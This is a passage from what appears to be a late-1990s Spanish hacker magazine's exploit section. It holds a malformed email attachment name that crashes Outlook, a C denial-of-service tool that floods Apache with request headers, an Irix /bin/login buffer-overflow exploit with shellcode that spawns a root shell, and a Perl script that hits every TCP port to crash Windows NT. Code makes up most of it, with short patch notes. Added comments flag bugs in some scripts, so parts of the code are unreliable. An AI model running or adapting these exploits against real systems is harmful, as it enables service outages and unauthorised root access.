Content-Type: MULTIPART/MIXED; BOUNDARY="204-1969819122-901726347=:19806"

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII

test

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Don't read this text file
--204-1969819122-901726347=:19806--

Cuelga el Outlook, dando un error en la direccion 0x41414141 (AAAA)


-( 0x0E )-
Para	 : Apache
Tema	 : Crash
Patch	 : http://www.apache.org
Creditos : Dag-Erling Coidan Smirgrav

<++> /set_016/exploits/sioux.c
/*-
 * Copyright (c) 1998 Dag-Erling Coidan Smirgrav
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer
 *    in this position and unchanged.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 *    derived from this software withough specific prior written permission
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 */

/*
 * Kudos to Mark Huizer who originally suggested this on freebsd-current
 */

#include <sys/types.h>

#include <sys/socket.h>
#include <netinet/in.h>

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Write the option synopsis to stderr and exit with status 1. */
void
usage(void)
{
    fputs("usage: sioux [-a address] [-p port] [-n num]\n", stderr);
    exit(1);
}

/* Entry point: sioux [-a address] [-p port] [-n num].
 * Opens one TCP connection (default localhost, port 80), sends a single
 * "GET / HTTP/1.1" request line followed by num identical User-Agent
 * header lines (default 1000), then closes the stream. No blank line is
 * sent, so the header block is never terminated.
 * For defenders: what is presumably being exercised is a server that
 * accepts an unbounded number of request headers. A per-request cap on
 * header count and size (in Apache, the LimitRequestFields family of
 * directives) is the control that addresses it; the accompanying text
 * points to apache.org for the fix.
 * Exits 1 on any setup or write error, 0 otherwise. */
int
main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *he;
    FILE *f;
    int o, sd;

    /* default parameters */
    char *addr = "localhost";
    int port = 80;
    int num = 1000;

    /* get options */
    while ((o = getopt(argc, argv, "a:p:n:")) != EOF)
        switch (o) {
        case 'a':
            addr = optarg;
            break;
        case 'p':
            port = atoi(optarg);
            break;
        case 'n':
            num = atoi(optarg);
            break;
        default:
            usage();
        }

    /* no positional arguments are accepted */
    if (argc != optind)
        usage();

    /* connect */
    if ((he = gethostbyname(addr)) == NULL) {
        perror("gethostbyname");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family = he->h_addrtype;
    sin.sin_port = htons(port);

    if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket");
        exit(1);
    }

    if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        perror("connect");
        exit(1);
    }

    /* wrap the socket in a stdio stream so fprintf() can be used on it */
    if ((f = fdopen(sd, "r+")) == NULL) {
        perror("fdopen");
        exit(1);
    }

    /* attack! */
    fprintf(stderr, "Going down like a plague of locusts on %s\n", addr);
    fprintf(f, "GET / HTTP/1.1\r\n");
    /* one header line per iteration; stops early on a stream error */
    while (num-- && !ferror(f))
        fprintf(f, "User-Agent: sioux\r\n");

    if (ferror(f)) {
        perror("fprintf");
        exit(1);
    }

    fclose(f);
    exit(0);
}
<-->


-( 0x0F )-
Para	 : Irix 6.3
Tema	 : root access
Patch	 : Donde siempre... SGI lo tiene, y nosotros tambien
Creditos : David Hedley

<++> set_016/exploits/login.c
/* /bin/login exploit by DCRH 24/5/97
 *
 * Tested on:   R3000 Indigo (Irix 5.3)
 *              R4400 Indy (Irix 5.3)
 *              R5000 O2 (Irix 6.3)
 *              R8000 Power Challenge (Irix 6.2)
 *
 * Compile as: cc -n32 login.c     (for Irix 6.x)
 *             cc login.c          (for Irix 5.x)
 *
 * Press enter when prompted for a password
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Layout constants used by main(): BUF_LENGTH bytes of filler plus code,
 * EXTRA bytes of repeated address, OFFSET added to the stack pointer, and
 * the 32-bit word used as filler. */
#define BUF_LENGTH      200
#define EXTRA           300
#define OFFSET          0x1b0
#define IRIX_NOP        0x03e0f825    /* move $ra,$ra */

/* Redefines u_long as plain unsigned for the rest of this file. */
#define u_long unsigned


/* Three instruction words that main() calls through a function pointer to
 * obtain the current stack pointer (see the per-word annotations). */
u_long get_sp_code[] = {
    0x03a01025,         /* move $v0,$sp         */
    0x03e00008,         /* jr $ra               */
    0x00000000,         /* nop                  */
};

/* Payload words with the author's per-instruction annotations; the last
 * two words spell "/bin" and "/sh". main() measures this array with
 * strlen(), and none of the words listed contains a zero byte. */
u_long irix_shellcode[] = {
    0x24041234,         /* li $4,0x1234         */
    0x2084edcc,         /* sub $4,0x1234        */
    0x0491fffe,         /* bgezal $4,pc-4       */
    0x03bd302a,         /* sgt $6,$sp,$sp       */
    0x23e4012c,         /* addi $4,$31,264+36   */
    0xa086feff,         /* sb $6,-264+7($4)     */
    0x2084fef8,         /* sub $4,264           */
    0x20850110,         /* addi $5,$4,264+8     */
    0xaca4fef8,         /* sw $4,-264($5)       */
    0xaca6fefc,         /* sw $4,-260($5)       */
    0x20a5fef8,         /* sub $5, 264          */
    0x240203f3,         /* li $v0,1011          */
    0x03ffffcc,         /* syscall 0xfffff      */
    0x2f62696e,         /* "/bin"               */
    0x2f7368ff,         /* "/sh"                */
};

/* Argument buffer assembled by main(): BUF_LENGTH + EXTRA bytes plus room
 * for the terminating zero word. */
char buf[BUF_LENGTH + EXTRA + 8];

/* Entry point. Builds buf as IRIX_NOP words, then the irix_shellcode words,
 * then EXTRA bytes of a repeated target address, and runs /bin/login with
 * "-h" and the buffer (from offset 1) as its argument and an empty
 * environment. An optional argv[1] is added to the target address.
 * The target address is the current stack pointer (read by calling the
 * get_sp_code words as a function) plus OFFSET, advanced in steps of 4
 * until none of its four bytes is zero.
 * For defenders: the trigger is an over-long "-h" argument to a setuid
 * login binary; the accompanying text gives "chmod u-s /bin/login" as the
 * workaround and says SGI has a patch.
 * NOTE(review): code_length comes from strlen() over an array that holds
 * no zero byte, so it depends on whatever follows the array in memory. */
void main(int argc, char **argv)
{
    char *env[] = {NULL};
    u_long targ_addr, stack;
    u_long *long_p;
    int i, code_length = strlen((char *)irix_shellcode)+1;
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    long_p =(u_long *)  buf;
    targ_addr = stack + OFFSET;

    if (argc > 1)
      targ_addr += atoi(argv[1]);

    /* a zero byte would end the string argument early, so skip such values */
    while ((targ_addr & 0xff000000) == 0 ||
           (targ_addr & 0x00ff0000) == 0 ||
           (targ_addr & 0x0000ff00) == 0 ||
           (targ_addr & 0x000000ff) == 0)
      targ_addr += 4;

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;

    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    /* the address is stored rotated by one byte; presumably this matches
     * the one-byte offset of &buf[1] passed to login below -- confirm */
    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = (targ_addr << 24) | (targ_addr >> 8);

    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

    execle("/bin/login", "login", "-h", &buf[1], 0, env);
    /* only reached when execle() itself fails */
    perror("execl failed");
}
<-->

Descripcion y Notas:

Cuando se ejecuta el exploit, nos pide una clave. Le damos a enter sin
teclear nada y estamos dentro con privilegios de root.

El patch es tan sencillo como ejecutar:

chmod u-s /bin/login


-( 0x10 )-
Para	 : Windows NT 4.0
Tema	 : Crash
Patch	 : Maybe SP3, Maybe LINUX
Creditos : Bob Beck

<++> set_016/exploits/nt.pl
#!/usr/local/bin/perl
# Opens a connection to each TCP port in turn on the host named by the first
# argument, sends one fixed text string, and closes the connection.
# For defenders: seen from the network this is a single source connecting to
# every port in ascending order, i.e. an ordinary port sweep; the
# accompanying text attributes the crash to ports 135 and 1031 (inetinfo).

use Socket;
use FileHandle;
require "chat2.pl";

# target host: first command-line argument
$ILoveBill = $ARGV[0] && shift;

$verbose = 0; # tell me what you're hitting
$knownports = 0;  # don't hit known problem ports
# NOTE(review): $0 is Perl's program-name variable, not the number 0;
# a start value of 0 was presumably intended.
for ($port = $0; $port<65535; $port++)
{

  # with $knownports left at 0 this skip never triggers
  if ($knownports && ($port == 135 || $port== 1031)) {
      next;
  }
  $fh = chat::open_port($ILoveBill, $port);
  chat::print ($fh,"Windows NT is the platform of the future");
  if ($verbose) {
          print "Trying port: $port\n\n";
  }
  chat::close($fh);
}
<-->

Descripcion y Notas:

Pues el mismo problema de siempre, el clasico con el puerto 135, el origen
de los nukes... pero en el puerto 1031, esto es, inetinfo.

Creo que ya lo hemos dicho en mas de una ocasion... Pero sigue fallando.